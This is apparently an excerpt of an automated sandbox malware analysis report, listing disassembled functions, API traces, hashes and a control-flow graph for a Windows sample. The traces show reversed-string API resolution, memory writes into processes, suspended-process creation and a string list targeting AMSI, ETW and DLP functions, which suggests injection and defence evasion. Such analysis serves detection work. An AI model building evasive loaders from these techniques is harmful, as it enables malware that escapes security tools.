                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                            • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                            • API String ID: 2521977463-737317276
                                                                                                                                            • Opcode ID: ad8f112b77067c208851bc46f1802ce202b83b2a8542cc211e2a324e909cb43b
                                                                                                                                            • Instruction ID: 71661a153e8d3919eb4607b8a76577cdb0919c6e461399956ca473da1df26124
                                                                                                                                            • Opcode Fuzzy Hash: ad8f112b77067c208851bc46f1802ce202b83b2a8542cc211e2a324e909cb43b
                                                                                                                                            • Instruction Fuzzy Hash: E1016D74600208AFEB02EFA8D865F9E77EDEB4C710F614868B904D7654D630AD108B25
                                                                                                                                            Function 027C7CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027C7D6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                            • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                            • API String ID: 2719805696-3542721025
                                                                                                                                            • Opcode ID: df026a3223aac5994ffefc305fa46b2dd9dda41283d65952aa76be06bc3ba308
                                                                                                                                            • Instruction ID: dee299fac7dee11b164edeada4775ddff8504cfae92582b1b250949f334fdc4d
                                                                                                                                            • Opcode Fuzzy Hash: df026a3223aac5994ffefc305fa46b2dd9dda41283d65952aa76be06bc3ba308
                                                                                                                                            • Instruction Fuzzy Hash: 93015274640208AFDB06EFA9DC65F9EBBEDEF4C710F614858B900D7690DA30AD508F61
                                                                                                                                            Function 027C84BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 027C8521
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                            • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                            • API String ID: 3503870465-2520021413
                                                                                                                                            • Opcode ID: 12c0696f69957a25fabf646524475235df55db58a5fcf315505e6bd1917e9c96
                                                                                                                                            • Instruction ID: 2c46e37b79007b720777e905a3b0069072874baf8fc24568b51798af90792f21
                                                                                                                                            • Opcode Fuzzy Hash: 12c0696f69957a25fabf646524475235df55db58a5fcf315505e6bd1917e9c96
                                                                                                                                            • Instruction Fuzzy Hash: 45016778640214AFEB03EF74DC65F9EB7EEEF48710F614868B400D7650DA70A9108F21
                                                                                                                                            Function 027CDE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                            • NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1459852867-0
                                                                                                                                            • Opcode ID: 2ce24ababce6ca6f7eafc07a418bbf65f452b31757eb2f10f0128c9f2612447b
                                                                                                                                            • Instruction ID: 7d98cfb5893a908f42111436f4ba976749917a8fb20798bc887b1d04bd31a9d0
                                                                                                                                            • Opcode Fuzzy Hash: 2ce24ababce6ca6f7eafc07a418bbf65f452b31757eb2f10f0128c9f2612447b
                                                                                                                                            • Instruction Fuzzy Hash: 4C0167B5A453486EEB16E7B08D95BCDB7BDAF54B00F6000FA9200E6091DA74AB048B21
                                                                                                                                            Function 027CDE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027B4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 027B4EDA
                                                                                                                                            • RtlInitUnicodeString.NTDLL(?,?), ref: 027CDEA0
                                                                                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDEF2), ref: 027CDEB6
                                                                                                                                            • NtDeleteFile.NTDLL(?), ref: 027CDED5
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1694942484-0
                                                                                                                                            • Opcode ID: 3a817f9686b4c7db5811e92c7d4fa8b5ca9fd98aaa395154757d53a2dff46c0e
                                                                                                                                            • Instruction ID: 403c081a4e4581e767b927489344e356a5e1c14781bf5d60998faffe1879dd58
                                                                                                                                            • Opcode Fuzzy Hash: 3a817f9686b4c7db5811e92c7d4fa8b5ca9fd98aaa395154757d53a2dff46c0e
                                                                                                                                            • Instruction Fuzzy Hash: E0011CB5940308BAD712EBF0CD55FDEB7FDDB54700F6044B5A601E2581EB74AB048A64
                                                                                                                                            Function 027C6D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C6CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,027C6D39,?,?,?,00000000), ref: 027C6D19
                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,027C6E2C,00000000,00000000,027C6DAB,?,00000000,027C6E1B), ref: 027C6D97
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFromInstanceProg
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2151042543-0
                                                                                                                                            • Opcode ID: 60b5186968cd136ee0db88e4193ac70b5d0866fa9dccd702321f039f026af41a
                                                                                                                                            • Instruction ID: b839cb2082419901345c8b8efea76418c09f3280c04fdcad111465aad08485c4
                                                                                                                                            • Opcode Fuzzy Hash: 60b5186968cd136ee0db88e4193ac70b5d0866fa9dccd702321f039f026af41a
                                                                                                                                            • Instruction Fuzzy Hash: 4201F7B12087046EE716DF71DCA696B7FADEB89B10B61087EF501D2640E6309910C860
                                                                                                                                            Function 027D7CAC Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5548 27d7cac-27d7e96 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 5603 27d7e9c-27d809b call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4898 5548->5603 5604 27d7e97 call 27c881c 5548->5604 5663 27d8f25-27d90a8 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4898 5603->5663 5664 27d80a1-27d8274 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4798 call 27b494c call 27b4d20 call 27b4d9c CreateProcessAsUserW 5603->5664 5604->5603 5753 27d90ae-27d90bd call 27b4898 5663->5753 5754 27d9854-27dae59 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c * 16 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27b46a4 * 2 call 27c881c call 27c7b90 call 27c8184 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c ExitProcess 5663->5754 5773 27d8276-27d82ed call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 5664->5773 5774 27d82f2-27d83fd call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 5664->5774 5753->5754 5763 27d90c3-27d9396 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27ce974 call 27b480c call 27b494c call 27b46a4 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b7e10 5753->5763 6021 27d939c-27d9649 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b4d8c * 2 call 27b4734 call 27cdf00 5763->6021 6022 27d964e-27d984f call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b49a4 call 27c8ba8 5763->6022 5773->5774 5874 27d83ff-27d8402 5774->5874 5875 27d8404-27d8724 call 27b49a4 call 27ce0c4 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27ccf9c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 5774->5875 5874->5875 6188 27d873d-27d8f20 call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c ResumeThread call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c CloseHandle call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27c7ecc call 27c8798 * 6 CloseHandle call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c call 27b480c call 27b494c call 27b46a4 call 27b4798 call 27b494c call 27b46a4 call 27c881c 5875->6188 6189 27d8726-27d8738 call 27c857c 5875->6189 6021->6022 6022->5754 6188->5663 6189->6188
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C881C: LoadLibraryA.KERNEL32(00000000,00000000,027C8903), ref: 027C8850
                                                                                                                                              • Part of subcall function 027C881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027C8903), ref: 027C8860
                                                                                                                                              • Part of subcall function 027C881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 027C8879
                                                                                                                                              • Part of subcall function 027C881C: FreeLibrary.KERNEL32(74AD0000,00000000,02812388,Function_000065D8,00000004,02812398,02812388,000186A3,00000040,0281239C,74AD0000,00000000,00000000,00000000,00000000,027C8903), ref: 027C88E3
                                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029067DC,02906820,OpenSession,0281237C,027DB40C,UacScan,0281237C), ref: 027D826D
                                                                                                                                            • ResumeThread.KERNEL32(00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C), ref: 027D88B7
                                                                                                                                            • CloseHandle.KERNEL32(00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C,027DB40C,00000000,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C), ref: 027D8A36
                                                                                                                                              • Part of subcall function 027C8798: LoadLibraryW.KERNEL32(bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize,028123A4,027CA774,UacScan), ref: 027C87AC
                                                                                                                                              • Part of subcall function 027C8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027C87C6
                                                                                                                                              • Part of subcall function 027C8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005DC,00000000,028123A4,027CA3BF,ScanString,028123A4,027CA774,ScanBuffer,028123A4,027CA774,Initialize), ref: 027C8802
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0281237C,027DB40C,UacInitialize,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,UacScan,0281237C), ref: 027D8E28
                                                                                                                                              • Part of subcall function 027B7E10: GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                              • Part of subcall function 027CDF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027CDFD2), ref: 027CDF3F
                                                                                                                                              • Part of subcall function 027CDF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027CDF79
                                                                                                                                              • Part of subcall function 027CDF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027CDFA6
                                                                                                                                              • Part of subcall function 027CDF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027CDFAF
                                                                                                                                              • Part of subcall function 027C8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027C820E), ref: 027C81F0
                                                                                                                                            • ExitProcess.KERNEL32(00000000,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,Initialize,0281237C,027DB40C,00000000,00000000,00000000,ScanString,0281237C,027DB40C), ref: 027DAE59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                                                                            • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
